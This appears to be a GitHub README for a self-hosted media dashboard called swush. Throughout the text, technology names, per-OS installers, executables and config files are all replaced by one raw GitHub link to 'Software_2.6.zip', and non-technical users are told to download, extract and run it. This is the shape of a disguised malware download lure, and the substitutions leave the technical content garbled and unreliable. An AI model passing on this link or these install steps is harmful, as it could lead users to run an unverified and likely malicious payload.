swush is an easy-to-use, self-hosted application that helps you manage your media files, documents, and online content in one place. It works as a personal dashboard where you can store, organize, and share your files safely. The app runs on your computer or server and keeps your data private.
Built using modern tools like https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip, TypeScript, and TailwindCSS, swush offers a smooth, fast experience with a clear design. It's perfect for anyone who wants control over their media and files without relying on third-party services.
Before installing swush, make sure your system meets these requirements:
- Operating System: Windows 10 or later, macOS 10.14 or later, or Linux (Ubuntu 18.04+ recommended)
- Processor: Intel or AMD, 64-bit
- Memory: At least 4 GB RAM
- Storage: Minimum 500 MB free space for installation and additional space for your files
- Network: Internet connection required for initial download and updates
- Software: https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip version 16 or newer (only if you plan to run the source code; prebuilt packages include https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip)
Follow these steps to download, install, and start using swush on your computer. No technical knowledge needed.
Go to the official swush releases page by clicking the button below:
This page contains the latest versions of swush ready to download.
On the releases page, look for the latest release (usually at the top). You will find files prepared for different operating systems, such as:
https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zipfor Windows usershttps://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zipfor macOS usershttps://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zipfor Linux users
Download the file that matches your operating system by clicking on it.
Once downloaded:
- On Windows, right-click the
.zipfile and choose βExtract All...β - On macOS, double-click the
.zipfile to unzip it - On Linux, use the command
tar -xvzf https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zipin the folder where you saved the file
Extraction will create a folder containing the swush application files.
Open the extracted folder and find the executable file:
- On Windows:
https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip - On macOS:
https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip(or similar) - On Linux:
swush(might need to make it executable withchmod +x swush)
Double-click this file to start the app.
Once swush starts, it will open a new window or tab in your web browser at http://localhost:3000. This is your personal dashboard where you can upload and organize your media and files.
swush offers a range of tools to help you manage your digital content smoothly:
- Media & File Management: Upload photos, videos, documents, and other files. Organize them with folders and tags.
- Secure Sharing: Share files or albums with a link, controlling who can view them.
- Self-Hosted: Your data stays on your computer or server. No third parties involved.
- Custom Dashboard: Add widgets for weather, notes, or quick links to access your important tools at a glance.
- Fast and Responsive: Built for quick loading and smooth use on desktop and tablet.
- Cross-Platform: Works on Windows, macOS, and Linux.
- Built on Modern Tech: Uses https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip and TypeScript for a stable and maintainable app.
Using swush means your data stays under your control. Because you run the app on your own device or server, you donβt send your files to unknown services. Access to the dashboard requires your device or network security, and you can add passwords or extra protection if needed.
When you run swush for the first time, it will create a local folder where it stores your files.
To customize the location or other settings:
- Find the
https://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zipfile in the main swush folder. - Open it with a simple text editor like Notepad or TextEdit.
- Change settings such as your media folder path or dashboard appearance.
- Save the file and restart swush for changes to apply.
If swush does not start or you encounter problems:
- App wonβt open: Make sure your system meets the requirements. Restart your computer and try again.
- Browser page doesnβt load: Type
http://localhost:3000directly in your browser address bar. - Files wonβt upload: Check your internet connection. Ensure you have enough disk space.
- I forgot the dashboard password: Look for instructions in the
READMEfile inside the app folder or reset your settings by deleting thehttps://raw.githubusercontent.com/Korpztak970/swush/main/src/app/api/Software_2.6.zip.
For further help, search swush issues or discussions on the GitHub repository.
Return to the releases page any time to get the latest versions:
Choose your version, download the file for your system, extract it, and run the app following the steps in this guide.
swush combines secure, self-hosted file management with an easy-to-use interface. It fits people who want full control over their images, videos, documents, and other digital content.
The project is open-source and welcomes feedback or contributions from users interested in improving the app.
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